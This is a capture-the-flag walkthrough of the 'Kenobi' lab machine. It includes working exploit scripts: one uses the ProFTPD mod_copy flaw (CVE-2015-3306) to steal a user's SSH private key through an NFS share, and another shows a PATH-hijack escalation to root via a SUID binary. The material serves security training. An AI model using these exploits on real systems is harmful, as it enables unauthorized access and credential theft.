
Enumeration

Greetings Jedi! We can find the Kenobi room here. Let's begin with a full port scan to determine what is open.

sudo nmap -p- -T4 10.10.110.39 -v

We don't have to worry about the ports nmap reports with an 'unknown' service; the identified ones tell the story:

  • Ports 111 (rpcbind), 139 and 445 (SMB) tell me this box is running some sort of file sharing, which will be of importance to us.
  • Ports 21 (FTP) and 80 (HTTP) are our most obvious targets to look at next.

Let’s try FTP anonymous log-on first.

We check whether anonymous login is allowed: we try the anonymous account with both a blank password and test@test.com, and get no luck with either. Either way, we've enumerated a service name and version, which is very useful: ProFTPD 1.3.5.

Next, we want to take a look at the webserver. We’re gonna run gobuster to enumerate directories while we poke around and look for the usual suspects.

sudo gobuster dir -w /opt/directory-list-2.3-medium.txt -t 40 -u 10.10.110.39

There’s nothing interesting on the home page, source code, or cookies - but we do have a robots page with a hidden directory.

Unfortunately, it seems to be a red herring as Admiral Ackbar so succinctly puts it.

Gobuster didn’t return any directories so we’re going to 86 the webserver for now and enumerate SMB. We can do this with SMBMap.

smbmap -H 10.10.110.39

(The trailing dollar sign on a share name, e.g. IPC$, marks it as hidden from browse lists.)

Note the permissions on ‘anonymous’. Let’s try seeing what’s in there with smbclient.

smbclient -N //10.10.110.39/anonymous

Looking at the file from /anonymous, we see some interesting things but no credentials or easy wins there.

Finally, we’re gonna go back to the rpcbind service and enumerate with nmap.

nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.110.39

We can see the mountpoint /var which will be useful soon.

Initial Access

We have a service version for FTP, ProFTPD 1.3.5, that we can search for public exploits. There are three results that look good, and the one that matters here is the mod_copy bug (CVE-2015-3306).

The mod_copy module allows us to copy files and directories between locations on the server, useful for an administrator, even more so for an attacker: its SITE CPFR (copy from) and SITE CPTO (copy to) commands are accepted before any login. We can exploit this by copying files into the NFS-exported mount point we found earlier, /var. While we couldn't log onto the FTP server before, we can still issue those two commands unauthenticated with a tool like netcat, pointing CPFR at kenobi's private key (assumed to be in the standard location, /home/kenobi/.ssh/id_rsa) and CPTO at a path under the export, such as /var/tmp/id_rsa.

Now we just need to mount /var, and kenobi's ssh key will be sitting in /var/tmp, which shows up as the tmp directory under our mount point. Copy it out, chmod it to 600, and ssh in as kenobi with -i.

mkdir /tmp/kenobi
sudo mount 10.10.110.39:/var /tmp/kenobi
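The two steps above as one script, added here as an example and not part of the original writeup. It assumes the target address from the scan, a key at /home/kenobi/.ssh/id_rsa, a destination of /var/tmp/id_rsa, and nc, an NFS client and sudo on the attacking box; the sample server transcript is constructed, not captured from the box. Only the part guarded by RUN_EXPLOIT=1 touches the network.

```shell
#!/bin/sh
# Added example (not from the original writeup): ProFTPD 1.3.5 mod_copy
# (CVE-2015-3306) into an NFS export, then pull the copied key out.
# Assumptions: target 10.10.110.39 runs ProFTPD 1.3.5 on 21 and exports /var,
# kenobi's key lives at /home/kenobi/.ssh/id_rsa, nc/mount.nfs/sudo are local.

TARGET=${TARGET:-10.10.110.39}
SRC=${SRC:-/home/kenobi/.ssh/id_rsa}
DST=${DST:-/var/tmp/id_rsa}     # must sit under the exported /var

# mod_copy honours SITE CPFR (pick source) and SITE CPTO (write the copy)
# before any USER/PASS, so the whole dialogue is three plain lines.
mod_copy_payload() {
    printf 'SITE CPFR %s\r\nSITE CPTO %s\r\nQUIT\r\n' "$1" "$2"
}

# Judge a server transcript: a 350 answers a good CPFR and
# "250 Copy successful" answers a good CPTO; anything else is a miss.
mod_copy_ok() {
    transcript=$1
    printf '%s\n' "$transcript" | grep -q '^350 ' || return 1
    printf '%s\n' "$transcript" | grep -q '^250 Copy successful' || return 1
    return 0
}

# Constructed samples of what the server sends back (not captured from the box).
SAMPLE_OK=$(printf '220 ProFTPD 1.3.5 Server ready.\r\n350 File or directory exists, ready for destination name\r\n250 Copy successful\r\n221 Goodbye.\r\n')
SAMPLE_DENIED=$(printf '220 ProFTPD 1.3.5 Server ready.\r\n550 %s: Permission denied\r\n' "$SRC")

# Fire the payload with netcat, echo the transcript, report success/failure.
run_mod_copy() {
    reply=$(mod_copy_payload "$SRC" "$DST" | nc -w 5 "$TARGET" 21)
    printf '%s\n' "$reply"
    mod_copy_ok "$reply"
}

# Mount the export and lift the copy: /var/tmp/id_rsa appears as <mnt>/tmp/id_rsa.
fetch_key() {
    mnt=$(mktemp -d)
    sudo mount -t nfs "$TARGET:/var" "$mnt"
    cp "$mnt/${DST#/var/}" ./id_rsa
    chmod 600 ./id_rsa          # ssh refuses a key with loose permissions
    sudo umount "$mnt" && rmdir "$mnt"
}

if [ "${RUN_EXPLOIT:-0}" = 1 ]; then
    run_mod_copy && fetch_key && ssh -i ./id_rsa kenobi@"$TARGET"
fi
```

The copy is written by the FTP daemon's own uid, so the destination directory has to be writable by it; /var/tmp is world-writable, which is why it works where /var itself would not.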

Privilege Escalation

We start with the usual enumerations

sudo -l

Turns up nothing: we logged in with a key and don't know kenobi's password, so sudo won't even list the rules for us.

Next let’s look for files with the SUID bit set.

find / -type f -perm -u=s 2>/dev/null

Hmm, /usr/bin/menu seems to stand out right away, let’s take a look and see what it does.

So we are presented with a menu; choosing 1, 2 or 3 makes the program run a function. Running strings on this binary shows it calls a few familiar utilities, curl, uname and ifconfig, and the danger lies in the fact that they are invoked by bare name rather than by full path (e.g. curl instead of /usr/bin/curl). Because of this misconfiguration we can create our own program, name it curl, put its directory at the front of PATH, and it will be executed as root, since /usr/bin/menu has the SUID bit set and the child inherits root's effective uid.
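The mechanism in isolation, as an added example that is not from the original writeup. The fake curl here only reports its uid so the script is safe to run on any box; on Kenobi you would put /bin/sh -p in it instead (bash drops a SUID effective uid unless -p is given) and then pick menu option 1. /usr/bin/menu itself is not reproduced; the script only mimics the curl -I localhost call it makes.

```shell
#!/bin/sh
# Added example (not from the original writeup): why a bare "curl" inside a
# SUID program is dangerous. Assumed: menu option 1 runs "curl -I localhost"
# by bare name. The fake curl just prints its euid; swap in "/bin/sh -p" on
# a real target to keep the SUID root euid.

# Drop an attacker-controlled "curl" into a directory we own.
make_fake_curl() {
    cat > "$1/curl" <<'EOF'
#!/bin/sh
# Fake curl: ignores its arguments and reports who it is running as.
echo "fake curl: euid=$(id -u)"
EOF
    chmod 755 "$1/curl"
}

# Which file does a bare "curl" resolve to once $1 leads PATH?
# (The subshell keeps the caller's PATH untouched.)
resolve_curl() {
    ( PATH="$1:$PATH"; command -v curl )
}

# Mimic menu option 1 under the poisoned PATH and return what actually ran.
menu_option_1_under() {
    ( PATH="$1:$PATH"; curl -I localhost 2>&1 )
}

# Walk through it once: build the fake, poison PATH, run "option 1".
demo() {
    dir=$(mktemp -d)
    make_fake_curl "$dir"
    echo "bare curl now resolves to: $(resolve_curl "$dir")"
    echo "menu option 1 executed:    $(menu_option_1_under "$dir")"
    rm -rf "$dir"
}

demo
```

The fix on the program's side is the one the writeup hints at: call /usr/bin/curl by absolute path, which bypasses PATH lookup entirely; a SUID binary should also reset PATH to a known value before spawning anything.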

And that’s Kenobi - have a nice day and thanks for reading 🙂